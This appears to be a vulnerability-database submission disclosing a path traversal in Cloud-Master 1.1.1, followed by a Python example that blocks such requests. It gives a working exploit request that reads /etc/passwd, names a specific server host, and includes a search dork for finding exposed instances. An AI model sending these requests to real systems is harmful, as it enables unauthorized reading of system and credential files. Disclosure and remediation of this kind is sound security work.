| Title | Safetytest Cloud-Master 1.1.1 Path Traversal: 'dir/../../filename' |
|---|
| Description | Cloud-Master v1.1.1 (hosted, for example, at https://example.com/) is vulnerable to path traversal. The vulnerability allows an attacker to access sensitive files and directories on the server outside the web application's root directory. Through crafted requests, an attacker can read critical files such as /etc/passwd, which contains information about the system's users.
Vulnerable Endpoint:
GET /static/
Exploitative Request:
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
Host: vmd115546.contaboserver.net
Connection: Keep-alive
The above request successfully returned the contents of the /etc/passwd file, confirming the vulnerability.
Vendor:
https://safetytest.atlassian.net/wiki/spaces/RMA/overview
Dork:
title="Cloud Master" |
|---|
| User | Eduardo Maragno (UID 80876) |
|---|
| Submission | 01/28/2025 14:43 (1 Year ago) |
|---|
| Moderation | 02/06/2025 15:41 (9 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 294862 [Safetytest Cloud-Master Server up to 1.1.1 /static/ path traversal] |
|---|
| Points | 17 |
|---|
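
The fix class for the /static/ traversal described above, as an added example that is not Cloud-Master code or part of the original submission: resolve the requested path under the static root and refuse anything that lands outside it. `STATIC_ROOT`, `resolve_static` and the sample request paths are assumptions made for illustration.

```python
import os
from urllib.parse import unquote

STATIC_ROOT = "/srv/app/static"  # assumed document root (hypothetical)
URL_PREFIX = "/static/"          # endpoint named in the report


def resolve_static(request_path, root=STATIC_ROOT):
    """Return the absolute path to serve, or None if the request is rejected."""
    if not request_path.startswith(URL_PREFIX):
        return None
    # Decode once, as the server would, so %2e%2e%2f is seen as ../
    rel = unquote(request_path[len(URL_PREFIX):])
    # NUL bytes and backslashes have no place in a static asset name here
    # (conservative choice; realpath would raise on an embedded NUL).
    if "\x00" in rel or "\\" in rel:
        return None
    root_real = os.path.realpath(root)
    # realpath collapses ".." segments and follows symlinks; a leading "/"
    # in rel makes join() discard the root, which the check below catches.
    candidate = os.path.realpath(os.path.join(root_real, rel))
    if os.path.commonpath([root_real, candidate]) != root_real:
        return None
    # The caller must still confirm that candidate is a regular file.
    return candidate


# Constructed sample request paths; the second is the one from the report.
SAMPLES = [
    "/static/css/site.css",
    "/static/../../../../../../../../../../../etc/passwd",
    "/static/%2e%2e/%2e%2e/etc/passwd",
    "/static//etc/passwd",
]

if __name__ == "__main__":
    for path in SAMPLES:
        verdict = resolve_static(path)
        print("SERVE " + verdict if verdict else "REJECT", "<-", path)
```

The containment check compares resolved paths rather than searching the URL for `../`, so encoded and absolute-path variants are rejected by the same rule.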